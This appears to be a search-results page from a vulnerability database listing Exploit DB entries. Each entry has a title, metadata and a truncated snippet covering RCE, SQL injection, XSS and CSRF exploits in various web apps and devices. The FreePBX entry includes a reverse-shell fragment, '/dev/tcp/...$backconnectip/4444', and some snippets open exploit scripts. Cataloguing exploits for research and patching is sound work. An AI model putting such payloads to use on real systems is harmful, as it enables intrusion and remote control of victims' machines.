Lucene search
K
ExploitdbMost viewed

47904 matches found

Exploit DB
Exploit DB
added 2025/12/08 12:0 a.m.342 views

Pluck 4.7.7-dev2 - PHP Code Execution

Exploit Title: Pluck 4.7.7-dev2 - PHP Code Execution Date: 2024-10-26 Exploit Author: CodeSecLab Vendor Homepage: https://github.com/pluck-cms/pluck Software Link: https://github.com/pluck-cms/pluck Version: 4.74-dev5 Tested on: Ubuntu Windows CVE : CVE-2018-11736 PoC: 1) 1. Log in to the Pluck...

9.8CVSS7AI score0.08573EPSS
Exploits3
Exploit DB
Exploit DB
added 2024/06/01 12:0 a.m.342 views

FreePBX 16 - Remote Code Execution (RCE) (Authenticated)

Exploit Title: FreePBX 16 - Remote Code Execution RCE Authenticated Exploit Author: Cold z3ro Date: 6/1/2024 Tested on: 14,15,16 Vendor: https://www.freepbx.org/ %26 /dev/tcp/'.$backconnectip.'/4444 0%261'; curlsetopt$ch, CURLOPTSSLVERIFYHOST, false; curlsetopt$ch, CURLOPTSSLVERIFYPEER, false; ec...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2024/04/02 12:0 a.m.342 views

LeptonCMS 7.0.0 - Remote Code Execution (RCE) (Authenticated)

Exploit Title: LeptonCMS 7.0.0 - Remote Code Execution RCE Authenticated Date: 2024-1-19 Exploit Author: tmrswrr Category: Webapps Vendor Homepage: https://www.lepton-cms.com/ Version : 7.0.0 1 Login with admin cred https://127.0.0.1/LEPTON/backend/login/index.php 2 Go to Languages place...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2024/03/25 12:0 a.m.342 views

Insurance Management System PHP and MySQL 1.0 - Multiple Stored XSS

Exploit Title:Insurance Management System PHP and MySQL 1.0 - Multiple Stored XSS Date: 2024-02-08 Exploit Author: Hakkı TOKLU Vendor Homepage: https://www.sourcecodester.com Software Link: https://www.sourcecodester.com/php/16995/insurance-management-system-php-mysql.html Version: 1.0 Tested on:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2024/03/05 12:0 a.m.342 views

Solar-Log 200 PM+ 3.6.0 Build 99 - 15.10.2019 - Stored XSS

Exploit Title: Stored XSS in Solar-Log 200 3.6.0 web panel Date: 10-30-23 Exploit Author: Vincent McRae, Mesut Cetin - Redteamer IT Security Vendor Homepage: https://www.solar-log.com/en/ Version: Solar-Log 200 PM+ 3.6.0 Build 99 - 15.10.2019 Tested on: Proprietary devices:...

5.4CVSS5.6AI score0.00446EPSS
Exploits4
Exploit DB
Exploit DB
added 2023/08/08 12:0 a.m.342 views

Pyro CMS 3.9 - Server-Side Template Injection (SSTI) (Authenticated)

Exploit Title: Pyro CMS 3.9 - Server-Side Template Injection SSTI Authenticated Exploit Author: Daniel Barros @cupc4k3d - Hakai Offensive Security Date: 03/08/2023 Vendor: https://pyrocms.com/ Software Link: https://pyrocms.com/documentation/pyrocms/3.9/getting-started/installation Vulnerable...

9.8CVSS9.6AI score0.4111EPSS
Exploits4
Exploit DB
Exploit DB
added 2023/04/06 12:0 a.m.342 views

Dompdf 1.2.1 - Remote Code Execution (RCE)

!/usr/bin/python3 Exploit Title: Dompdf 1.2.1 - Remote Code Execution RCE Date: 16 February 2023 Exploit Author: Ravindu Wickramasinghe @rvizx9 Vendor Homepage: https://dompdf.github.io/ Software Link: https://github.com/dompdf/dompdf Version: 1.2.1 Tested on: Kali linux CVE : CVE-2022-28368 Gith...

9.8CVSS9.6AI score0.82438EPSS
Exploits8
Exploit DB
Exploit DB
added 2022/02/23 12:0 a.m.342 views

WebHMI 4.1.1 - Remote Code Execution (RCE) (Authenticated)

Exploit Title: WebHMI 4.1.1 - Remote Code Execution RCE Authenticated Date: 03/01/2022 Exploit Author: Antonio Cuomo arkantolo Vendor Homepage: https://webhmi.com.ua/en/ Version: WebHMI 4.1.1.7662 Tested on: WebHMI-4.1.1.7662 !/usr/bin/python import sys import re import argparse import requests...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/03/02 12:0 a.m.342 views

Web Based Quiz System 1.0 - 'MCQ options' Persistent Cross-Site Scripting

Exploit Title: Web Based Quiz System 1.0 - 'MCQ options' Persistent/Stored Cross-Site Scripting Date: 2021-03-02 Exploit Author: Praharsh Kumar Singh Vendor Homepage: https://www.sourcecodester.com Software Download Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/10/01 12:0 a.m.342 views

WebsiteBaker 2.12.2 - 'display_name' SQL Injection (authenticated)

Exploit Title: WebsiteBaker 2.12.2 - 'displayname' SQL Injection authenticated Google Dork: - Date: 2020-09-20 Exploit Author: Roel van Beurden Vendor Homepage: https://websitebaker.org Software Link: https://wiki.websitebaker.org/doku.php/en/downloads Version: 2.12.2 Tested on: Linux Ubuntu 18.0...

9.8CVSS9.8AI score0.01668EPSS
Exploits3
Exploit DB
Exploit DB
added 2020/07/14 12:0 a.m.342 views

Trend Micro Web Security Virtual Appliance 6.5 SP2 Patch 4 Build 1901 - Remote Code Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Trend Micro Web Security Virtual Appliance Remote Code Execution', 'Description' = %q This module exploits multiple vulnerabilities together in...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/05/19 12:0 a.m.342 views

NukeViet VMS 4.4.00 - Cross-Site Request Forgery (Change Admin Password)

Exploit Title: NukeViet VMS 4.4.00 - Cross-Site Request Forgery Change Admin Password Date: 2020-05-18 Exploit Author: JEBARAJ Vendor Homepage: https://nukeviet.vn/ Software Link: https://github.com/nukeviet/nukeviet/releases/download/4.4.00/nukeviet4.4.00setup.zip Version: 4.4.00 Tested on:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/10/10 12:0 a.m.342 views

Microsoft Windows Kernel - Out-of-Bounds Read in CI!CipFixImageType While Parsing Malformed PE File

We have encountered a Windows kernel crash in CI!CipFixImageType while trying to load a malformed PE image into the process address space as a data file i.e. LoadLibraryExLOADLIBRARYASDATAFILE | LOADLIBRARYASIMAGERESOURCE. An example crash log generated after triggering the bug is shown below: --...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2025/08/26 12:0 a.m.341 views

Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure

/ Exploit Title : Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure Author : Byte Reaper Telegram : @ByteReaper0 CVE : CVE-2025-6082 Software Link : https://frp.wordpress.org/plugins/birth-chart-compatibility/ Description : Proof‑of‑Concept exploits the Full Path Disclosure bu...

5.3CVSS9.5AI score0.01567EPSS
Exploits2
Exploit DB
Exploit DB
added 2025/04/02 12:0 a.m.341 views

ABB Cylon Aspect 3.08.01 - Arbitrary File Delete

Exploit Title : ABB Cylon Aspect 3.08.01 - Arbitrary File Delete Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: =3.08.01 Summary: ASPECT is an award-winning scalable building energy management a...

10CVSS7.8AI score0.17159EPSS
Exploits3
Exploit DB
Exploit DB
added 2024/08/04 12:0 a.m.341 views

Genexus Protection Server 9.7.2.10 - 'protsrvservice' Unquoted Service Path

Exploit Title: Genexus Protection Server 9.7.2.10 - 'protsrvservice' Unquoted Service Path Service Path Exploit Author : SamAlucard Exploit Date: 2024-07-31 Vendor : Genexus Version : Genexus Protection Server 9.7.2.10 Software Link: https://www.genexus.com/en/developers/downloadcenter?data=;;...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2024/04/08 12:0 a.m.341 views

Daily Expense Manager 1.0 - 'term' SQLi

Exploit Title: Daily Expense Manager 1.0 - 'term' SQLi Date: February 25th, 2024 Exploit Author: Stefan Hesselman Vendor Homepage: https://code-projects.org/daily-expense-manager-in-php-with-source-code/ Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2024/03/20 12:0 a.m.341 views

Blood Bank 1.0 - 'bid' SQLi

Exploit Title: Blood Bank 1.0 - 'bid' SQLi Date: 2023-11-15 Exploit Author: Ersin Erenler Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code Software Link: https://download-media.code-projects.org/2020/11/BloodBankInPHPWithSourcecode.zip Version: 1.0 Tested on:...

7.8CVSS7.8AI score0.00795EPSS
Exploits4
Exploit DB
Exploit DB
added 2023/08/04 12:0 a.m.341 views

Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting

Exploit Title: Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting Date: 2023.Aug.01 Exploit Author: Pedro ISSDU TW Vendor Homepage: https://loganalyzer.adiscon.com/ Software Link: https://loganalyzer.adiscon.com/download/ Version: v4.1.13 and before Tested on: Linux CVE : CVE-2023-36306 There ar...

6.1CVSS6.6AI score0.03771EPSS
Exploits4
Exploit DB
Exploit DB
added 2023/04/20 12:0 a.m.341 views

FUXA V.1.1.13-1186 - Unauthenticated Remote Code Execution (RCE)

Exploit Title: FUXA V.1.1.13-1186- Unauthenticated Remote Code Execution RCE Date: 18/04/2023 Exploit Author: Rodolfo Mariano Vendor Homepage: https://github.com/frangoteam/FUXA Version: FUXA V.1.1.13-1186 current from argparse import RawTextHelpFormatter import argparse, sys, threading, requests...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/09/09 12:0 a.m.341 views

Bus Pass Management System 1.0 - 'adminname' Stored Cross-Site Scripting (XSS)

Exploit Title: Bus Pass Management System 1.0 - 'adminname' Stored Cross-Site Scripting XSS Date: 2021-09-08 Exploit Author: Emre Aslan Vendor Homepage: https://phpgurukul.com/ Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip Version:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/02/05 12:0 a.m.342 views

SEO Panel 4.6.0 - Remote Code Execution (2)

Exploit Title: SEO Panel 4.6.0 - Remote Code Execution 2 Date: 22 Jan 2021 Exploit Author: Kr0ff Vendor Homepage: https://www.seopanel.org/https://www.kentico.com/ Software Link: https://www.seopanel.org/spdownload/4.6.0 Version: 4.6.0 Tested on: Ubuntu 20.04 !/usr/bin/env python3 ''' DESCRIPTION...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/10/19 12:0 a.m.341 views

Nagios XI 5.7.3 - 'Contact Templates' Persistent Cross-Site Scripting

Exploit Title: Nagios XI 5.7.3 - 'Contact Templates' Persistent Cross-Site Scripting Date: 10-18-2020 Exploit Author: Matthew Aberegg Vendor Homepage: https://www.nagios.com/products/nagios-xi/ Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/ Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/06/01 12:0 a.m.341 views

VMware vCenter Server 6.7 - Authentication Bypass

Exploit Title: VMware vCenter Server 6.7 - Authentication Bypass Date: 2020-06-01 Exploit Author: Photubias Vendor Advisory: 1 https://www.vmware.com/security/advisories/VMSA-2020-0006.html Version: vCenter Server 6.7 before update 3f Tested on: vCenter Server Appliance 6.7 RTM updated from v6.0...

9.8CVSS8AI score0.90384EPSS
Exploits20
Exploit DB
Exploit DB
added 2020/05/29 12:0 a.m.341 views

Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass

Exploit Title : Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass Exploit Author : Halis Duraki @0xduraki Date : 2020-05-28 Product : http-protection Crystal Shard Product URI : https://github.com/rogeriozambon/http-protection Version : http-protection = 0.2.0 CVE : N/A About the product...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/12/03 12:0 a.m.341 views

Intelbras Router RF1200 1.1.3 - Cross-Site Request Forgery

Exploit Title: Intelbras Router RF1200 1.1.3 - Cross-Site Request Forgery Date: 2019-11-06 Exploit Author: Joas Antonio Vendor Homepage: intelbras.com.br Software Link: https://www.intelbras.com/pt-br/roteador-wireless-smart-dual-band-action-rf-1200 Version: 1.1.3 REQUIRED Tested on: Windows CVE ...

6.5CVSS6.7AI score0.09632EPSS
Exploits5
Exploit DB
Exploit DB
added 2019/12/02 12:0 a.m.341 views

SmartHouse Webapp 6.5.33 - Cross-Site Request Forgery

Exploit Title: SmartHouse Webapp 6.5.33 - Cross-Site Request Forgery Discovery by: LiquidWorm Date: 2019-12-02 Vendor Homepage: Tested Version: 6.5.33.17072501 CVE: N/A Advisory ID: ZSL-2019-5543 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5543.php Carlo Gavazzi SmartHous...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2024/06/26 12:0 a.m.340 views

Automad 2.0.0-alpha.4 - Stored Cross-Site Scripting (XSS)

Exploit Title: Automad 2.0.0-alpha.4 - Stored Cross-Site Scripting XSS Date: 20-06-2024 Exploit Author: Jerry Thomas w3bn00b3r Vendor Homepage: https://automad.org Software Link: https://github.com/marcantondahmen/automad Category: Web Application Flat File CMS Version: 2.0.0-alpha.4 Tested on:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2024/05/04 12:0 a.m.340 views

Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 - Authentication Bypass

Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Authentication Bypass Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: 1.0.0 Revision 7304 1.0.0 Revision 7284 1.0.0 Revision 6505 1.0.0 Revision 6332 1.0.0 Revision 6258 XS2DAB v1.50 rev 6267 Summary: Cleber offer...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2023/10/09 12:0 a.m.340 views

Wordpress Sonaar Music Plugin 4.7 - Stored XSS

Exploit Title: Wordpress Sonaar Music Plugin 4.7 - Stored XSS Date: 2023-09-05 Exploit Author: Furkan Karaarslan Category : Webapps Vendor Homepage: http://127.0.0.1/wp/wordpress/wp-comments-post.php Version: 4.7 REQUIRED Tested on: Windows/Linux...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2023/10/09 12:0 a.m.340 views

Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Credentials Extraction

!/usr/bin/env python Exploit Title: Tinycontrol LAN Controller v3 LK3 - Remote Credentials Extraction Exploit Author: LiquidWorm Vendor: Tinycontrol Product web page: https://www.tinycontrol.pl Affected version: this with a calendar when - then. The device provides a user interface in the form of...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2023/08/21 12:0 a.m.340 views

Dolibarr Version 17.0.1 - Stored XSS

Exploit Title: Dolibarr Version 17.0.1 - Stored XSS Dork: Date: 2023-08-09 Exploit Author: Furkan Karaarslan Category : Webapps Vendor Homepage: http://127.0.0.1/dolibarr-17.0.1/htdocs/user/note.php Version: 17.0.1 REQUIRED Tested on: Windows/Linux CVE :...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2023/05/02 12:0 a.m.340 views

PHPJabbers Simple CMS 5.0 - SQL Injection

Exploit Title: PHPJabbers Simple CMS 5.0 - SQL Injection Date: 2023-04-29 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.phpjabbers.com/faq.php Software Link: https://www.phpjabbers.com/simple-cms/ Version: 5.0 Tested on: Kali Linux Request GET...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2023/04/20 12:0 a.m.340 views

ProjeQtOr Project Management System 10.3.2 - Remote Code Execution (RCE)

Exploit Title: ProjeQtOr Project Management System 10.3.2 -Remote Code Execution RCE Application: ProjeQtOr Project Management System Version: 10.3.2 Bugs: Remote Code Execution RCE Authenticated via file upload Technology: PHP Vendor URL: https://www.projeqtor.org Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2023/04/20 12:0 a.m.340 views

Serendipity 2.4.0 - Remote Code Execution (RCE) (Authenticated)

Exploit Title: Serendipity 2.4.0 - Remote Code Execution RCE Authenticated Application: Serendipity Version: 2.4.0 Bugs: Remote Code Execution RCE Authenticated via file upload Technology: PHP Vendor URL: https://docs.s9y.org/ Software Link: https://docs.s9y.org/downloads.html Date of found:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2022/07/29 12:0 a.m.340 views

Geonetwork 4.2.0 - XML External Entity (XXE)

Exploit Title: Geonetwork 4.2.0 - XML External Entity XXE Date: 2022-July-11 Exploit Author: Amel BOUZIANE-LEBLOND https://twitter.com/amellb Vendor Homepage: https://geonetwork-opensource.org/ Version: Geonetwork 3.10.X through 4.2.0 Tested on: Microsoft Windows Server & Linux Description:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2022/01/25 12:0 a.m.340 views

Online Project Time Management System 1.0 - SQLi (Authenticated)

Exploit Title: Online Project Time Management System 1.0 - SQLi Authenticated Date: 19/01/2022 Exploit Author: Felipe Alcantara Filiplain Vendor Homepage: https://www.sourcecodester.com/ Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2022/01/18 12:0 a.m.340 views

Creston Web Interface 1.0.0.2159 - Credential Disclosure

Exploit Title: Creston Web Interface 1.0.0.2159 - Credential Disclosure Exploit Author: RedTeam Pentesting GmbH Advisory: Credential Disclosure in Web Interface of Crestron Device When the administrative web interface of the Crestron HDMI switcher is accessed unauthenticated, user credentials are...

10CVSS9.7AI score0.75711EPSS
Exploits5
Exploit DB
Exploit DB
added 2021/03/23 12:0 a.m.340 views

Hi-Rez Studios 5.1.6.3 - 'HiPatchService' Unquoted Service Path

Exploit Title: Hi-Rez Studios 5.1.6.3 - 'HiPatchService' Unquoted Service Path Dicovery by: Ekrem Can Kök Discovery Date: 2021-03-22 Vendor Homepage: https://www.hirezstudios.com Version: 5.1.6.3 Tested on: Windows 10 Pro x64 Step to discover Unquoted Service Path: C:\wmic service get name,...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2021/02/01 12:0 a.m.340 views

bloofoxCMS 0.5.2.1 - CSRF (Add user)

Title: bloofoxCMS 0.5.2.1 - CSRF Add user Exploit Author: LiPeiYi Date: 2020-12-18 Vendor Homepage: https://www.bloofox.com/ Software Link: https://github.com/alexlang24/bloofoxCMS/releases/tag/0.5.2.1 Version: 0.5.1.0 -.5.2.1 Tested on: windows 10 Desc: The application interface allows users to...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/08/05 12:0 a.m.340 views

QlikView 12.50.20000.0 - 'FTP Server Address' Denial of Service (PoC)

Exploit Title: QlikView 12.50.20000.0 - 'FTP Server Address' Denial of Service PoC Discovery by: Luis Martinez Discovery Date: 2020-08-03 Vendor Homepage: https://www.qlik.com Software Link: https://www.qlik.com/us/trial/qlik-sense-business Tested Version: 12.50.20000.0 Vulnerability Type: Denial...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/04/06 12:0 a.m.340 views

Vesta Control Panel 0.9.8-26 - Authenticated Remote Code Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Vesta Control Panel Authenticated Remote Code Execution", 'Description' = %q This module exploits command injection vulnerability in...

9CVSS7.4AI score0.77261EPSS
Exploits7
Exploit DB
Exploit DB
added 2019/10/10 12:0 a.m.340 views

SMA Solar Technology AG Sunny WebBox device - 1.6 - Cross-Site Request Forgery

Exploit Title: SMA Solar Technology AG Sunny WebBox device - 1.6 - Cross-Site Request Forgery Date: 2019-10-08 Exploit Author: Borja Merino and Eduardo Villaverde Vendor Homepage: https://www.sma.de Version: Firmware Version 1.6 and prior Tested on: Sunny WebBox SMA Solar Device Firmware Version...

8.8CVSS9AI score0.03087EPSS
Exploits4
Exploit DB
Exploit DB
added 2019/08/26 12:0 a.m.340 views

openITCOCKPIT 3.6.1-2 - Cross-Site Request Forgery

Exploit Title: openITCOCKPIT 3.6.1-2 - CSRF 2 RCE Google Dork: N/A Date: 26-08-2019 Exploit Author: Julian Rittweger Vendor Homepage: https://openitcockpit.io/ Software Link: https://github.com/it-novum/openITCOCKPIT/releases/tag/openITCOCKPIT-3.6.1-2 Fixed in: 3.7.1 |...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2025/06/05 12:0 a.m.339 views

Microsoft Windows Server 2025 JScript Engine - Remote Code Execution (RCE)

!/usr/bin/env python3 Exploit Title: Microsoft Windows Server 2025 JScript Engine - Remote Code Execution RCE Exploit Author: Mohammed Idrees Banyamer Instagram: @@banyamersecurity GitHub: https://github.com/mbanyamer Date: 2025-05-31 CVE: CVE-2025-30397 Vendor: Microsoft Affected Versions: Windo...

7.5CVSS7.4AI score0.21228EPSS
Exploits7
Exploit DB
Exploit DB
added 2025/04/11 12:0 a.m.339 views

ABB Cylon FLXeon 9.3.4 - System Logs Information Disclosure

Exploit Tiltle: ABB Cylon FLXeon 9.3.4 - System Logs Information Disclosure Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: FLXeon Series FBXi Series, FBTi Series, FBVi Series CBX Series FLX Series CBT Series CBV Series Firmware: =9.3.4 Summary: BACnet® Smart Building...

9.4CVSS7AI score0.02366EPSS
Exploits7
Exploit DB
Exploit DB
added 2025/04/03 12:0 a.m.339 views

Microsoft Office 2019 MSO Build 1808 - NTLMv2 Hash Disclosure

Exploit Title: Microsoft Office 2019 MSO Build 1808 - NTLMv2 Hash Disclosure Exploit Author: Metin Yunus Kandemir Vendor Homepage: https://www.office.com/ Software Link: https://www.office.com/ Details: https://github.com/passtheticket/CVE-2024-38200 Version: Microsoft Office 2019 MSO Build 1808...

9.1CVSS6.8AI score0.19534EPSS
Exploits2
Exploit DB
Exploit DB
added 2024/06/14 12:0 a.m.339 views

Carbon Forum 5.9.0 - Stored XSS

Exploit Title: Persistent XSS in Carbon Forum 5.9.0 Stored Date: 06/12/2024 Exploit Author: Chokri Hammedi Vendor Homepage: https://www.94cb.com/ Software Link: https://github.com/lincanbin/Carbon-Forum Version: 5.9.0 Tested on: Windows XP CVE: N/A Vulnerability Details A persistent stored XSS...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2024/05/31 12:0 a.m.339 views

changedetection < 0.45.20 - Remote Code Execution (RCE)

Exploit Title: changedetection = 0.45.20 Remote Code Execution RCE Date: 5-26-2024 Exploit Author: Zach Crosman zcrosman Vendor Homepage: changedetection.io Software Link: https://github.com/dgtlmoon/changedetection.io Version: = 0.45.20 Tested on: Linux CVE : CVE-2024-32651 from pwn import impor...

10CVSS9.8AI score0.83722EPSS
Exploits5
Exploit DB
Exploit DB
added 2024/05/04 12:0 a.m.339 views

Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link - Device Config Disclosure

Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link Device Config Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: 0.01 Revision 0 Summary: The REBLE610 features an accurate hardware design, absence of internal cabling and full modularity. The unit is composed by a...

7.4AI score
Exploits0
Total number of security vulnerabilities5000